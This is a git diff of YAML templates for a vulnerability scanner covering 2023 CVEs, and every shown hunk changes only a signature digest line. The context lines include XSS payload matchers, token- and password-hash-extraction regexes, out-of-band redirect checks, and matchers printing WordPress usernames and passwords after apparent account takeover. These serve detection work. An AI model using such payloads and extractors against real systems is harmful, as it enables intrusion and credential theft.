@@ http: regex: - "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]" internal: true -# digest: 4a0a0047304502207e107d63a92d437ea36fe3294ee12e5e23017f45c92427efb8ee2876d98f02bd022100b41521b425d00033c913385c3408da3b9ca4037df233817fb2d91c500620317f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b87815b376eff87b8e81df4dbc125c91882942b0ba9bb3eb743effb574e34d0302206611b8e3bd562e81d0122a40bb24d240ddbf05ace217f252d72d48bdb2998b83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index cb4d80cec2..cb4ebf0d18 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100a271284d69cac1f4f872b9bff6588e356c8648cf640264b5606b808c55a3cfbd022100fb26ec06577c0fb74a98f0ba3f0cb1fda60beb381bb735d688514022df6bf3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021267676d2b0caf3b0abf2b1ad002c1b21aeb900af8aaf1da1431254edcfd2b40221009713d87ebfdea3a87e6e930de7a2d321010abf8c53a1dd14b45af1012c89bd02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index 6db19106f8..d7a59891b9 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -55,4 +55,4 @@ http: - 'duration>=6' - 'status_code == 200' condition: and -# digest: 4b0a00483046022100c0dcbeb57b4e99aa73a40a91cba812a27203182bca95ab6b14d25f64a6a6cedc022100f9d201151cf04d6e74c390f8a539f56663322adfec3fd01c59b4a895a124695f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b510c150d2e6cf0b4697b44beac3cd589f45d6b26e082db5fb5a9c09303736450220465ca9ff102223548c23048a8590c767a10c739760ab78088e6b4aa5471d3cb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index ea14897000..719894083f 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Advanced Custom Fields")' condition: and -# digest: 490a00463044022056850f415fae2d0929dad93fe10665c4ffa3942c147dfc81c7ebf791f92ac5b50220214d9094cddb98c12f33f8027ead5c1b1977b3ac248e35474df4173260e464fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203519c9cc80a50590dae099f69444e784bec905dbd3d0cfd0444fb1ef60816d1f02204fe21213712048f52f207ad3a25a4f50937bf470a0ad505e3c872ebe10b77193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index b5a5248335..9a372736b1 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -47,4 +47,4 @@ http: - 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")' - 'status_code_2 == 200' condition: and -# digest: 4b0a00483046022100be09a7bfdcc1497edc43924eab1f4067bcaa9567f68893d5408a9fecf5225de302210082881da0e9b08085c550a7bba75ab651b42f223287c1dd66731cf28ebd69b507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220190481a719136316c9ba89f9f2939e193e19bd3ed466d8d7e2e0a1c8d83f4eab0221009305805e4a7c444a33913a5937a05df99836aebb8cbe484b636680272ddbde7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 70421c8cae..8aa13ee98e 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -80,4 +80,4 @@ http: regex: - 'name="logintoken" value="([a-zA-Z0-9]+)">' internal: true -# digest: 4b0a004830460221008f298a6e3c9630e270f965e1eb76ad282dc1013c066ba86b81ca984e5c759221022100b3cadd4c5e1edc8028ee6372aa7c634e053893e68cee34de8fdc2e8ce44c75cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100828b6422250d2f0eacad42dfc9ff5b621925a0ab9d28201028af494122f7bfb1022100f3cc921066d9381b2950d12a50afc826e89e0f2e75e88beb79a203e155006b23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index c71f0a5eee..cecedd05b2 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022037988cb94ec5fefe05f0dd589b9f27b78e4d9b73921069ebaccb42a00135ca7a02200fd647168e28fb0e37753bdd00a50dcf4ac7cb131ef5a7dce28ad22f8220aa9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be68b55db3ad67605b5ce4332184521018201647893335d9470193350f1834ac022100ffc9632c452c6b140662e7de2b32f211f15c2ac980d78a100a02880909a73a00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index df4af1a7a0..334dc611e5 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -45,4 +45,4 @@ http: - type: regex regex: - "^OK$" -# digest: 4a0a00473045022100a8303b0cd10a64a26c1017b52482339440bbe857e22361f8d58e29bed65bc03302205340556a2173736013f81b1ad2bfa44459a577ac9e4ee71bbf10a5f1917725bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b412c7a9620de402b8322d4bbe35449064130bda28901dc50fd28f2a54b930960220306ddf4ede99885b0a0aa2d242b0f239a1b4fd44810791fc73d706723914f12e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index 809e10ea89..fde0e95710 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -42,4 +42,4 @@ http: part: body words: - '{"seriesID":' -# digest: 490a0046304402201eb69dd460edd54d047f99e7c17e6536f36af9d8c7d2154a6c83cbd7fc8c268a02202960f6694f51f8c7d773f12ee9e40deabe3a8b55921acfe988226be8aa75dfc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022062b6e0c0530f09a4fb5d82a488bb5a9b8c30e17a30cbf0322716f416f5cd2bc902207130d6f8d9a489b594915a4459ad3e54c7ea4415774bb7b9b5b08f0654747fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 1931ca6ce2..1bc2341040 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "onfocus=\"alert(document.domain)\" autofocus=\"\">")' - 'contains(body_2, "ChurchCRM")' condition: and -# digest: 4a0a004730450221009a02aa59a6a1236d95d032bfb4241ced35bf26029952519fd2031904e69f134f0220414be6fa3a6f964f5e9e9c9a3d99939b24c5d7d95a3315a4eda5b29f923afc61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7a5e13d5c7dc991bd7a56540690cd04e964d143cb0cb207bafa4b40056f7078022100a0dd45c4c270376c10d96a5ce999d8e6774ad21ce9423a7eb28770710358e9d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index f901dafa16..b79fc1eb82 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -38,4 +38,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")' condition: and -# digest: 490a00463044022044db0025b30ee01f7b653b83140795eaf85cb6c5037c5f592c309666b0191a660220208862f3f2eb0ddb3dcc357a3c4811cc439136e6f123760564c5c0cf2f9274ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022bb6a32bbe67ce63f09a569ea77dbc532a426bb9ee2a6e51aceb5faf05842a40220632654660f5d4f4a8430ed0af848009258f9b5297792356180d1c9f6dfca60d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index d5ae54008e..a8fc161f17 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de57a10bfb7f4faa9acd530eede927372fc258914a5d1f5fa476a9317bea80db0220635e62864d2ab58097102400c7516d610bdd42516cbb280f12aab1e009a3b21b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015d82fb8acb7bfa5aef151775c007ac7392755232b3b58e59c3691a6719c2f76022100d6ddfb3d581b73eeae01ec24e9fd1bc7148176fd2e0936619bb5b8089a442dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index a1ddc1903f..5fac83ca7a 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -108,4 +108,4 @@ http: - type: dsl dsl: - '"WP_USERNAME: "+ wordpress_username + " WP_PASSWORD: "+ password' -# digest: 4a0a00473045022100a26b83d631646ec09af3af65eb293c9a3f3761a84afecbfca21c5e8f0973d6fe022064a99db818cef379e23b844ee31a73da1796fdad71351add8163625aaf7e6a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d9afa0d68b07694175c57ad8f7b5388a4b0ad0ec1f92993ad5ec4a15dd38e5ef022100bafc6ce6e931ccb821730c75059d98cbee26f3827f8fa6541ed7ed0884abacbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 7c82376fb8..30e6b9c68f 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202de73ede6c782fa2e7558f120af51ccdb43e6a834f0cb11b796ac10f14abf745022068858456f26584ae6b4d402af1069998db1db3a842d77a00531bafc642d74867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b8a2187eee029f0b7de9882ee0c9c883e781051896f19ca21d4a0a64281583d5022100e889424a42a8a9f8303d12b5e470510e2240db26e1798ffb17a30377a3545aa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 3b8370abe5..03d2a62bd3 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -57,4 +57,4 @@ http: part: body_2 words: - "CVE-2023-32563" -# digest: 490a0046304402207ef41427803cc77d9625eb96fcb7415c04bb9cdb0cc70363d165754c36f0c44902204d3a8adef4461aac1fac0b12e9ce6ec990138f2a800440d04195167b5401293a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bcb886c214a8274523a21aff0b8a3ddb9c802aaf224163eff068884c00eeb89a0221009d23274822bbcdf1d23b8faad8293c92291c08909d8e7419b963dc6644e10b5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 1fb2c9f850..4d986e27d9 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -47,4 +47,4 @@ http: - 'contains(body_2, "Change Password")' - 'contains(body_2, "Old Age Home Management System|| Dashboard")' condition: and -# digest: 4a0a00473045022049057b44ba68b587a1d00ddececb11eb4b27973f9ed5ba5245e260357d80f01e022100c0abd873024b519872465347f63f229d7d4f19a80fa3fefb6e91f5645122b483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220603bdc568c4f8bd254d3de537116f53403754a72af1ec456be55b3cc86bbad9b022100fb5e43cac19c09bc220b1ca500ce14df1866cf778dad28ecdc0da95f52ff3ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index 794a2e3ef7..1d2dbc4bd0 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -39,4 +39,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header -# digest: 4b0a00483046022100a8cc2487ecefb4e25e4229b95328dd670f5646f049cec123bc2d0f5f2d34c710022100fe1204d93a53829adb780486928f36bf4a2e53c68e323ebbaa01efa091650583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220688bfd54312c98cad70ea11756eb7d605e63cefdbf740953ec17b2758ffc9b58022074870fe4f5e1a9bad57a43ddb9c459c577ed1d240208b5b0a52d9830f15e5a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 9b16725752..06995026bc 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -48,4 +48,4 @@ http: - 'contains(body, "Fatal error:")' - 'contains(body, "XPATH syntax error:")' condition: and -# digest: 4a0a00473045022038e305e1a427828938e09914041e2f6b067eac093c57894b8e785e2226c492120221009c7b52f37dbe1da9686032f5a6807f5ebe4accd86ee5119086ce69fb0d806439:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9a83ae1afdf43ea099513f3584f1caac1e8a777e61d101821e80a29960249cb022074a42afd0ca26223778dcd1ea8d2372e6b5b53f971633f5b7fb4ac1f8c35b7d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 4f13c943c1..6c819010db 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -85,4 +85,4 @@ http: - 'len(body_1) == 1' - 'contains(body_2, "Faculty Evaluation")' condition: and -# digest: 4a0a00473045022100f46293b8073f7feb73466f375ea29605a51c096af01c4816241166a69c603631022014393248bcab1932c5437e8434c9d61f71848a6068b89042745e3b10cc28e967:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b5d53a634d522ffd0302ad7feec865783d2a241b8f3ccfd0b3d4a8d441a765202207e6111dade4a0684ae0224bab14df4d8e4ee5a17142d2c379d1615b52abc4032:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 4c02631ca1..57ae61a021 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -75,4 +75,4 @@ http: regex: - '"nonce":"([a-z0-9]+)","versionString' internal: true -# digest: 4b0a00483046022100d9d214d95910b9ab36686cebb68a0c698a36dcd4f494d1ba91e3d9c36a77cc66022100b58afe9567fddc352d339dfa985e55105c2184de7b06d0a2a756ba07e34d1979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df1e86d9fc956df53bf31eecfcb419718e7cb6b90305c5927341af67c249bcb30220608d59b3161d92fd9e28b9c9c7ea01c5e879c25bc20d0b247590501904e508c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index 010c64efed..b11596ec06 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e162dbb1787d5c8b032abe3bf70bb51a039c53b2df9c8e71d5971b297d962bb0221009b98beb3b2add0df90bddc57c9ed57f15adc1f361360d012658f5c9e2265d724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220171abcc1c0a83a429a04ba26dc24dbabb63a86500669886aac8290f2fe0e7c81022100a1b42db8bf7ef06ccf26e400d065cc3b7b4871399e0b76c0500aa7b121e4b29e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index bd1a73705a..8ad2d88a92 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ea402dd44c43bec190ee2c16ae40ec0becb281a3f9867e3060d721011b78172f0220207c33b176fb9d8e6bf50fe9c81e797fd14fa29c9e39886d850c61d378f9f352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220134e0463102496737a2efd38625b6a7aeda5925f8f9924751b0917a46cc17d10022065a6e0e9df979a4efc3ee24912f2916fd08762932995091f79ea114ddf822664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml index 328e959999..016e70a4ca 100644 --- a/http/cves/2023/CVE-2023-33584.yaml +++ b/http/cves/2023/CVE-2023-33584.yaml @@ -46,4 +46,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 490a0046304402202f40626ab7516149dc904a0b037b08e20f1600b2c5120af0de3a1ae0c7734d740220179ff4ff2a58eb3877f3c34bb4da803721baf5aeb1e1f69ace56203fd229a98a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206aaa84cea2c1bd95ad50ada9f31acf013411b7cc186218000d599f6a5fcb5f4c0220475a15acd3ca7129f3a4a37fa8f08f102f77fe30ab802737f61c6585f97452a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index c20fbd45bb..ac6e498000 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -48,4 +48,4 @@ http: - status_code_2 == 200 - contains_all(body_2, 'www', 'www_multi') condition: and -# digest: 4b0a00483046022100b6854bf0faa5050128ca42d2d2ee3d37b3e95d98ee44027b193290a3cb94d1690221008fc6436949fc3b2d1ec7052d3740326ec505a58597f35ba52a30bae0163b9a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220010a42dcc79d3f304caa62a907714a428e2a193d274b69fce7dc0cfe4cda97880220765de31c96bf2c968cb53f751fc2f3900eb928d56e97ce5edc301442091ff3ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index 85b6d868c2..3b3d43d113 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -76,4 +76,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a004630440220045df4ec7bd54f950a3e0c12515456f864f6b6b0c5157bf1926e6f7a8e0759ef02203aed940f4a3d5004abd9ab1a98f0acba93578c711cb452f66bc908ae41ee4bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f131e049a903929669620739a042ef371cc53d14f7e330b5b1dd0a50032adb2e022100c65b26151fa200111cc70cbf4e292e7de91799cdd5ec182bf139fc69896ec655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 8c7e47e1c5..9acfeb4e3a 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3a7d1063d8635eb891376a22064bd392f1ead31bb4930547b533a9efa30ca36022065ed89b3798c768de3abfc936c9f78d68c3320d5e0f93b7f3908128065037934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204906769baaa40653efd8db40c78d1b7a5edc2464a567a9dee1b23c10b735a8f502200e663a070de2ca910bc6c3e9b9736ab7f055c56b105bde2cac618eadf82664f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34020.yaml b/http/cves/2023/CVE-2023-34020.yaml index 7b7c314455..95255a6a06 100644 --- a/http/cves/2023/CVE-2023-34020.yaml +++ b/http/cves/2023/CVE-2023-34020.yaml @@ -33,4 +33,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100863feeb025ff903aec139893d251ec1fb6d2afd5b5817e69dba4be2f8939696902201d851c543d8c5013957bc626be07c2d192201385d1a8f3ab7505696dc02b13e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c291b8c777b1f2832181c0b177acec46e3a1864d8cda77bb5d56b7aabd0cf5d022100bb38f50f255d8d3fcea6bbe1d7bc2367500fee3c65ea13c990bc0c970a2f4934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index e9e0046db9..49b6bf1bb0 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -91,4 +91,4 @@ http: group: 1 regex: - "getPwdHash.*,'([0-9]+)'" -# digest: 4a0a00473045022100dff5af913f6255a502dbf50816f39ec4a629ff0e3275b9fd2aa5c0d742b9a85202207d90e978f0d17059baa99aac6f41112ed07e6dda4ec8b392b8ed6ea5956c3716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220535bce466bdc32d6868a70227a183d1b6246f93d044a5aecde35e07f4ddb140a022100d8d1f4d3c91b5da971ecd3f6a2c1431fca7c60a3ba9bf7dbcdbacea3a67bdbe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index b7e9c7e166..ac440faa69 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dfe11a778c6bdc20a3e3c51aa378203f41b531b6cf2b922ffddca585df371d4e022100ea0109fec66b77cdff0258b416143e4a92a9b0da63dd600edb0836e302cc174e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220565b9c37b53169915914ce76aa88eda5c5c85f6f97f130b384923bb32f87173f022100f64be4191c6db18ae4d2c6447f91bd5a10dd17c89ffed7373b4c903b24da0ed4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 406fc7064e..ac5b3e2c32 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -131,4 +131,4 @@ http: regex: - '"access_token":"([^"]+)"' part: body -# digest: 4a0a00473045022100b66b36a008640a423f2f0fa1a14b6eb4ea8e0c6286f98b3bda9ed0b5bca93d6602207271e8506cb66d80bf7ba5b3e3dffb13a6d9efb504e04a023023eabc45ac1ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f72d08a9b9e841e0d447155a1414f61d5ae334e47b039783b1c835489d799ab2022100952cf077ba2d49d2a333ddb774a88cc81eaba6a5ac76e2ed85bdfe6974a14999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 8f929d6583..7bf13dbae1 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -58,4 +58,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "HotelDruid")' condition: and -# digest: 4a0a0047304502200de8e633c0dd2ad6adb380982fe7ad6513164c424ed34a3632ca17c73f0920e10221009c417b2df6c96eefaeb795d7f1b2f7c2ad6db0d80b376dbeda82d37ab8bb5554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220594727b9aa1101988289ccadc4c1c6546c46c0670893e0695189c996466496920221008e5888788e8db0931ef0643410d2ae1a34c6293b915967180eecc5b282857d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 63628bf4ec..612b542d3e 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eaebd01f85c85ab0ac1c84e6687bddb67703b7b394beddfc320b8a31e9c6cd8d022100d361cee4f4db9cd03330b2674ac1fdba912a93c4ea328fdca0d56ded1ca1dd72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ca220a11f960573e2129266cde12324d410026c5d5d0587bfce9b5847c87409022100f2ef58a2d030365cd3311aed103b93e2a9fbde99170d36a6d5dbb99d50abff41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index a54eff2245..f69511db73 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -86,4 +86,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203cec5c69d848ab901cd50048ccf42101ac2225bf4526924741e76b9c2d71f0c602205a4b024f5bc6a5bf347f17eaecb260bd276bc4001285005c217c13d424a5b233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022045b390f5760ae270e3a2519cce300ec389e0ee56fd2db189cdb00dfa65cfad0c02201654dcbabab3dd638bdef30d973d90eaa2bb5315592d3abc7059c6dbe3973959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 9d5d784e8e..0bebb53fd9 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -105,4 +105,4 @@ http: dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' -# digest: 4b0a00483046022100b493c7d63335e4d391cb5cc16773998839c91742ebdca9ed34de149a896d8635022100dd6e41ff08a478312111f10087ecd9bcf0cab2c7596f13f55ced60e7ff2102bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220173eeac6cfcdda83cedba6a13700d48f6167c4a69304204c41c53291982fec3602204eb02aaf7b7b0995b3b8092e842f23bbb69e20c6b44bb3a7335caf50d296446b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index d86ab04fb3..4101e78588 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009479667c973f231f672de742d4d97331b4c21e19dbb0a788759c317ba27f8c39022048d0e0658080c3f33b833368dad4f9bf938432524fa1d99a3bc9bb30daf57e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220261dcb2fc690e0650162d3d2590314a23a7e22334a2d7a97876251db319cf4e402207e8d42b990514592525016042ca6befa9c490acf09625ea741303d3354fcca40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 55e4298a76..052e9a6997 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -50,4 +50,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 